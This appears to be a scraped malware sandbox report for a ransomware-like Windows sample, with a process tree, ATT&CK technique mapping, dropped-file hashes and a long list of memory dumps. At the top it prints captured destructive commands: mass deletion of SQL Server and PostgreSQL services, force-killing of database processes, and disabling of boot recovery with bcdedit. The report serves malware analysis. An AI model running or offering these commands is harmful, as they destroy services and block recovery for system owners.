"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
3⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:700

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:952

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ksifbwxmmfbgnkill$-arab.bat
Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
memory/108-84-0x0000000000000000-mapping.dmp

Download
memory/296-137-0x0000000000000000-mapping.dmp

Download
memory/296-113-0x0000000000000000-mapping.dmp

Download
memory/320-58-0x000000006F2F0000-0x000000006F89B000-memory.dmp

Filesize
5.7MB

Download
memory/320-59-0x000000006F2F0000-0x000000006F89B000-memory.dmp

Filesize
5.7MB

Download
memory/320-60-0x000000006F2F0000-0x000000006F89B000-memory.dmp

Filesize
5.7MB

Download
memory/320-121-0x0000000000000000-mapping.dmp

Download
memory/320-56-0x0000000075F21000-0x0000000075F23000-memory.dmp

Filesize
8KB

Download
memory/320-55-0x0000000000000000-mapping.dmp

Download
memory/480-81-0x0000000000000000-mapping.dmp

Download
memory/480-138-0x0000000000000000-mapping.dmp

Download
memory/576-125-0x0000000000000000-mapping.dmp

Download
memory/576-61-0x0000000005EF0000-0x0000000006114000-memory.dmp

Filesize
2.1MB

Download
memory/576-54-0x0000000000A60000-0x0000000000A68000-memory.dmp

Filesize
32KB

Download
memory/580-104-0x0000000000000000-mapping.dmp

Download
memory/640-119-0x0000000000000000-mapping.dmp

Download
memory/692-120-0x0000000000000000-mapping.dmp

Download
memory/692-94-0x0000000000000000-mapping.dmp

Download
memory/700-136-0x0000000000000000-mapping.dmp

Download
memory/700-114-0x0000000000000000-mapping.dmp

Download
memory/772-118-0x0000000000000000-mapping.dmp

Download
memory/828-126-0x0000000000000000-mapping.dmp

Download
memory/836-108-0x0000000000000000-mapping.dmp

Download
memory/844-67-0x0000000000000000-mapping.dmp

Download
memory/852-70-0x0000000000000000-mapping.dmp

Download
memory/872-107-0x0000000000000000-mapping.dmp

Download
memory/872-128-0x0000000000000000-mapping.dmp

Download
memory/892-87-0x0000000000000000-mapping.dmp

Download
memory/932-72-0x0000000000000000-mapping.dmp

Download
memory/1004-80-0x0000000000000000-mapping.dmp

Download
memory/1016-74-0x0000000000000000-mapping.dmp

Download
memory/1016-133-0x0000000000000000-mapping.dmp

Download
memory/1080-62-0x0000000000000000-mapping.dmp

Download
memory/1124-68-0x0000000000000000-mapping.dmp

Download
memory/1128-124-0x0000000000000000-mapping.dmp

Download
memory/1132-78-0x0000000000000000-mapping.dmp

Download
memory/1164-66-0x0000000000000000-mapping.dmp

Download
memory/1200-109-0x0000000000000000-mapping.dmp

Download
memory/1204-139-0x0000000000000000-mapping.dmp

Download
memory/1304-82-0x0000000000000000-mapping.dmp

Download
memory/1404-117-0x0000000000000000-mapping.dmp

Download
memory/1476-123-0x0000000000000000-mapping.dmp

Download
memory/1508-131-0x0000000000000000-mapping.dmp

Download
memory/1508-112-0x0000000000000000-mapping.dmp

Download
memory/1540-79-0x0000000000000000-mapping.dmp

Download
memory/1568-64-0x0000000000000000-mapping.dmp

Download
memory/1572-103-0x0000000000000000-mapping.dmp

Download
memory/1612-88-0x0000000000000000-mapping.dmp

Download
memory/1616-73-0x0000000000000000-mapping.dmp

Download
memory/1632-76-0x0000000000000000-mapping.dmp

Download
memory/1632-115-0x0000000000000000-mapping.dmp

Download
memory/1636-77-0x0000000000000000-mapping.dmp

Download
memory/1684-134-0x0000000000000000-mapping.dmp

Download
memory/1684-111-0x0000000000000000-mapping.dmp

Download
memory/1700-129-0x0000000000000000-mapping.dmp

Download
memory/1768-98-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-101-0x0000000000408F1E-mapping.dmp

Download
memory/1768-140-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-100-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-96-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-95-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-122-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-92-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-90-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-89-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1768-106-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1780-83-0x0000000000000000-mapping.dmp

Download
memory/1800-85-0x0000000000000000-mapping.dmp

Download
memory/1808-97-0x0000000000000000-mapping.dmp

Download
memory/1812-86-0x0000000000000000-mapping.dmp

Download
memory/1836-116-0x0000000000000000-mapping.dmp

Download
memory/1920-135-0x0000000000000000-mapping.dmp

Download
memory/1924-110-0x0000000000000000-mapping.dmp

Download
memory/1924-69-0x0000000000000000-mapping.dmp

Download
memory/1952-130-0x0000000000000000-mapping.dmp

Download
memory/1980-75-0x0000000000000000-mapping.dmp

Download
memory/1992-65-0x0000000000000000-mapping.dmp

Download
memory/2012-71-0x0000000000000000-mapping.dmp

Download
memory/2024-127-0x0000000000000000-mapping.dmp

Download
memory/2032-132-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads